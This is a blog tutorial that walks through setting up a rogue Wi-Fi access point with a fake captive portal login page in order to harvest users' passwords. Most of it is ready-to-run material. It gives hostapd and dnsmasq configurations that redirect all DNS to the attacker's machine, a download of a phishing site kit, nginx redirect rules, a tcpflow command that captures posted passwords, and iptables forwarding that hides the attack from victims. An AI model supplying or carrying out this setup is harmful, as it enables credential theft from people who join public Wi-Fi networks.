Captive Portal Guide: Setup Your Fake Access Point

by hash3liZer . 12 January 2019

Captive Portal Guide: Setup Your Fake Access Point

It often happens that when you connect to a WiFi network, you get a notification or a splash screen that tells you to do something in order to use the WiFi. Usually, you will see a login screen. That screen is called Captive Portal.

So, what is it? Captive Portal is a small functional web document usually triggered through DNS spoofing & server redirection rules to trick the OS. If successful, the OS will trigger the Captive Portal Login Page.

Let's see how we can setup a Captive Portal Login Page.

So, how does a captive portal work? It works through DNS hijacking or Server redirection rules. Every OS has it's own way of detecting the captive portal in place. But mostly, the OS's looks for 302 redirection responses. Let's study each of their responses.

Windows:

Windows has it's obfuscated way of detecting captive portal. Usually, it would be one of two sites:

www.msftconnecttest.com
www.msftncsi.com

Android:

Android checks for returned response code. For example, if the returned response is 302, the OS will assume it to be the captive portal and trigger it. Usually, it be one of the following:

clients3.google.com
connectivitycheck.gstatic.com
connectivitycheck.android.com

Apple:

Unlike Android & Windows, Apple when sends a request to the site, the site checks for a specific header that may clarify the nature of requested device. Apple requests for urls, usually:

www.appleiphonecell.com
captive.apple.com
www.apple.com
.apple.com.edgekey.net

From iOS 7+, apple uses a specific User-Agent for Captive Portal requests: CaptiveNetworkSupport that can be used to trace Apple devices.

Let's see how to setup the Captive Portal. We will be using hostapd for access point configuration, dnsmasq for DHCP server and nginx as our hosting web server and redirection rules.

STEP 1

Installation

To acheive our objective, we will perform the step as a whole. Install nginx and other required tools and update your repositories:

$ apt update
$ apt install hostapd dnsmasq nginx

Then put your wireless interface in monitor mode:

$ airmon-ng start wlan1

STEP 2

Rogue Access Point

We are about to use hostapd for hosting our Access Point. But this time, with a bit amendment, here's a link for hosting an access point with roguehostapd which infact would make the task more easier by replacing the actual configuration with a few arguments. 

Create and save the hostapd configuration for Access Point:

$ nano /tmp/hostapd.conf
interface=wlan1mon
driver=nl80211
ssid=[Fake AP Name] 
hw_mode=g
channel=[Fake AP Channel]
macaddr_acl=0
ignore_broadcast_ssid=0

Start hostapd service:

$ hostapd /tmp/hostapd.conf

STEP 3

DHCP Server

Now, we need a DHCP server to setup a small network provide the connecting users with ip addresses. We will use dnsmasq for the purpose. Create and save a new configuration file for dnsmasq:

$ nano /tmp/dnsmasq.conf
interface=wlan1mon
address=/#/192.168.1.1
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Up here in the configuration we used a field address. What it does is redirect all the ip addresses and hosts to a single ip as provided and in our case it is the gateway address where our forged website will reside:

address=/#/192.168.1.1

Just in case you want to redirect only a few sites, you will have to explicitly define each site individually followed by slash and the site to be followed. This way is used when you are willing to provide internet access to the users. For example:

address=/facebook.com/192.168.1.1
address=/google.com/192.168.1.1
address=/youtube.com/192.168.1.1

But we don't want it here for we want to give maximum redirects. It's because we don't know a user is going to request which site. So, why don't redirect all?

Start dnsmasq service:

$ dnsmasq -C /tmp/dnsmasq.conf -d

Finally, execute these two commands to assign gateway ip and netmask to your interface:

$ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

STEP 4

Captive Portal

Here starts the actual work. Create a new directory to place your website and move to that directory. I would name it captive_portal.

$ mkdir /var/www/captive_portal
$ cd /var/www/captive_portal

Now, download the Rogue AP website and extract the files under this directory:

$ wget https://www.shellvoide.com/media/files/rogueap.zip
$ unzip rogueap.zip -d ./

Now, you would have files placed under your captive_portal directory. All we need now is to setup nginx configuration for our captive portal project. First, remove enabled sites from nginx configuration directory:

$ rm /etc/nginx/sites-enabled/*

Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

$ nano /etc/nginx/sites-enabled/captive_portal
server{
    listen 80;
    root /var/www/captive_portal;        

    location / {
        if (!-f $request_filename){
            return 302 $scheme://192.168.1.1/index.html;
        }
    }
}

What is happening behind in the nginx configuration is whenever a file which doesn't exist is requested by the user, the request will be redirected to our fake page i.e. 192.168.1.1 which is exactly what we are trying to accomplish. You should note that this is the most important part where the non-existent files are being redirected. The directive root specifies the directory where the website is placed. Finally, reload the nginx service:

$ service nginx reload
$ service nginx restart

Check if nginx is correctly serving our fake page:

$ service nginx status

STEP 5

Capture Password

Since, we have our servicable access point along with a forged document, we need a way to capture the password credentials. Previously, we used MySQL database to store the data. However, there's even a better approach. Let's do sniffing and capture what is posted in the network. Open a terminal and execute this command:

$ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

What is happening is we are capturing the whole network traffic on every interface and then piping it to grep which will look for specific lines. I've set this up according to what will be POSTed when a user will enter password and press Enter on Captive Portal Login page. It will print data on screen when entered on the forged website: 

STEP 6

Internet Forwarding (Optional)

The last step is to provide our users with internet facility. However to acheive it would be a bit controversial. What we need to do is change or uncomment the address field in dnsmasq configuration. But if we do then Captive Portal will no longer work. So, what to do?

To overcome this complication, i.e. to provide internet as well as Captive Portal should also be served, the address field is to be explicitly defined for a set of given sites. For example, to only redirect android based operating systems, the address field would be:

address=/clients3.google.com/192.168.1.1

The same could be applied to other websites as well. There are multiple sites which are to be correctly redirected for this. I don't know all of them but some of those famous and widely implemented sites can be configured:

interface=wlan1mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

address=/clients3.google.com/192.168.1.1
address=/gsp1.apple.com/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/www.appleiphonecell.com/192.168.1.1
address=/www.airport.us/192.168.1.1
address=/.apple.com.edgekey.net/192.168.1.1
address=/.akamaiedge.net/192.168.1.1
address=/.akamaitechnologies.com/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/ipv6.msftncsi.com/192.168.1.1
address=/www.msftncsi.com/192.168.1.1

Then restart dnsmasq with this configuration.

Finally, we need another interface which have internet connection and the traffic from this interface will be forwarded to the access point interface. I've my this interface named wlan0 from where i will redirect traffic to wlan1mon. Execute the following commands with your respective interfaces:

$ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
$ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

Now, just one step to go...

$ echo 1 > /proc/sys/net/ipv4/ip_forward

It's all setup. Pick up your mobile, connect to the Rogue Access Point and see for yourself. If you enter password in the fields and press enter, the captured data will be printed in tcpflow terminal:

Conclusion

The conclusion that can be drawn from all of the above is users can easily be tricked into performing some unexpected tasks when it comes to wifi. With the help of captive portal login the overall performance and interactivity of the Access Point increases and the attack becomes more surfaced. Above all, the working of captive portal is merely placed upon the principle of redirection.